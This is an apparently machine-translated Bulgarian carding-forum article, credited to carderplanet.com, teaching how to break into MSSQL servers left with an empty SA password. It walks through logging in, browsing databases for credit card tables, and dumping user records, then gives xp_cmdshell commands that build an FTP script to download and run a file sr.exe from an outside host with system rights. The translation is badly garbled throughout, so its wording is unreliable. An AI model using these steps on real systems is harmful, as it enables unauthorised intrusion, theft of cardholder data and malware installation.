След три дни, след посещение на психиатър, и като студен душ започне, всъщност в този процес.
В този момент, вече има много автомобили, които са известни, че те работят MSSQL сървър, който се вслушва в стандартния порт 1433. Ти не знаеш кой от тези сървъри са монтирани на отпадналите администратори, като четете тази статия с интерес, и не си направи труда да се промени по подразбиране паролата SA в с празна парола за нещо по-прилично.
Run QA, в изскочил прозорец, въведете:
- SQL Server: IP от списъка naskanennogo използване SRA
- Tick Старт SQL, ако тя се спира, без да стане
- Свържете се с помощта на: удостоверяване SQL Server
- име Вход: SA
- Парола: празно поле
В случая на типове съобщения: Вход подава молба за потребител "SA", не вярва SQL сървър и т.н., натиснете "OK" и опитайте следното ПР от списъка.
Е, най-накрая, вместо скучно Вход подадена, ние се просто изведнъж откри, снежнобялата, прозорецът с заглавие тип "Query 12.11.32.45.master.sa" - ти отиде на SQL-сървър, поздравления =)
Хит на F8, в ляво има списък с бази данни, намерени на този сървър. Просто искам да предупредя: Магистър база данни с имена, модел, MSDB, Northwind, заведения, tempdb са услуги или доставени на MSSQL като пример - те видите че няма смисъл - така, както самостоятелно обучение.
Ако списъкът с база данни, ще видите нещо като ONLINESHOP (=)) кликнете върху кръста в ляво от името на базата данни от падащото списъка - на кръста от лявата страна на потребителя таблици. Ето списък на таблиците в базата данни. С кликване върху кръста в ляво от името на таблицата, можете да получите списък с имената на полетата в таблицата.
От моя собствен опит за убийството на време, мога да видя, че по-голямата част от имената на таблици и полета носи повече смисъл - ако базата данни е с голям брой карти, а след това най-вероятно ще бъдат записани CreditCardNumber - или в името на таблицата или в полето Име на маса.
1. В списъка от падащото меню изберете горния името QA на желаната база данни.
2. Порт девствен вид бял прозорец bukvochki заявка:
изберете топ 100 * от потребители
Тази заявка връща горните 100 реда от потребителите на масата
изберете брой (*) от потребители
Това искане ще покаже броя на редовете в потребителите на настолни
xp_cmdshell "CMD / в ехо Администриране> ftp1cmd / в ехо парола >> ftp1cmd / в ехо двоичен >> ftp1cmd / в ехо получите sr.exe >> ftp1cmd / в ехо откажат >> ftp1cmd / в FTP -s: ftp1 -d 12.12 .12.12 "
това искане ще се изтегли от FTP-сървър 12.12.12.12 с потребителско име и парола Admin парола файл sr.exe на
xp_cmdshell "CMD / в sr.exe"
и това искане ще стартира sr.exe на отдалечена машина с правилата SQL-сървър - което, като правило, или система или DomainAdmins.
Ако някой все още не е предположил, xp_cmdshell "реж C: \" ще покаже съдържанието на диска C: \.
Всички права върху статията принадлежат към www.carderplanet.com сайт.
Покажете тази статия на приятел:
Свързани статии